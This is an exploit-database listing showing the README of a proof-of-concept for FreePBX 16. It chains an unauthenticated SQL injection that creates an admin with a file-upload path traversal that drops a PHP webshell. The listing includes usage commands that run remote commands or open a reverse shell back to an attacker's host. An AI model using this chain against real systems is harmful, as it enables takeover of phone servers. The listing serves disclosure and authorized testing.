Exploit for SQL Injection in Sangoma Freepbx CVE-2025-57819 CVE-2025-61678

Name: Exploit for SQL Injection in Sangoma Freepbx CVE-2025-57819 CVE-2025-61678
Rating: 5 (6 reviews)
2026-06-19 | CVSS 10.0
## https://sploitus.com/exploit?id=A52A5B67-31DB-5B86-B528-C2F4F2A57FB3
# FreePBX 16 — Unauthenticated SQLi to RCE

Proof-of-concept exploit chaining two FreePBX vulnerabilities to go from **zero access** to
**remote code execution** on FreePBX 16.

| CVE | Component | Impact |
|-----|-----------|--------|
| **CVE-2025-57819** | Endpoint module loader (`brand` parameter) | Unauthenticated stacked SQL injection |
| **CVE-2025-61678** | Endpoint Manager firmware uploader (`fwbrand` parameter) | Authenticated arbitrary file upload (path traversal) |

## How it works

1. **Create an admin (CVE-2025-57819)** — a stacked SQL injection reachable without authentication
   via the namespaced endpoint loader is used to `INSERT` a brand-new full-access administrator
   directly into the `ampusers` table.
2. **Authenticate** — the PoC logs into the admin panel as the freshly created user.
3. **Drop a webshell (CVE-2025-61678)** — the Endpoint Manager firmware upload handler is abused
   with a `../../../var/www/html/` traversal in `fwbrand` to write a PHP webshell into the
   web root.
4. **Execute** — run a single command or receive an interactive reverse shell.

## Affected versions

FreePBX 16 (Endpoint module prior to `16.0.92`). Also patched in `17.0.6`.
Update to a fixed release.


## Requirements

```bash
pip install requests pwntools
```


## Usage

```bash
# single command
python3 exploit.py --rhost pbx.example.com --command "id"

# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
```

### Options

| Flag | Description |
|------|-------------|
| `--rhost` | Target host (required) |
| `--rport` | Target port (default `443`) |
| `--http` | Use HTTP instead of HTTPS |
| `--lhost` / `--lport` | Reverse-shell callback address |
| `--command` | Run a single command instead of a shell |


## Disclaimer

This proof-of-concept is provided strictly for educational purposes and authorized security
testing. It is intended for use only against systems you own, or for which you have obtained
explicit, documented written permission to test (e.g. an authorized penetration test, bug bounty
program in scope, or CTF environment).

Unauthorized access to computer systems is illegal in most jurisdictions. The author and any
contributors assume no liability and are not responsible for any misuse, damage, or legal
consequences arising from the use of this software. By using this PoC, you agree that you are
solely responsible for ensuring you have the legal right to test the target system.

## License

This PoC is provided as-is for educational and authorized security testing purposes, without
warranty of any kind, express or implied. The author disclaims all liability for any direct,
indirect, incidental, or consequential damages arising from its use.

## Keywords

FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk ·
CVE-2025-57819 · CVE-2025-61678 · unauthenticated SQL injection · stacked query injection ·
endpoint module · Endpoint Manager · authenticated file upload · path traversal ·
remote code execution · RCE · PoC · exploit · VoIP security

---
Author [TYehan](https://tyehan.github.io/)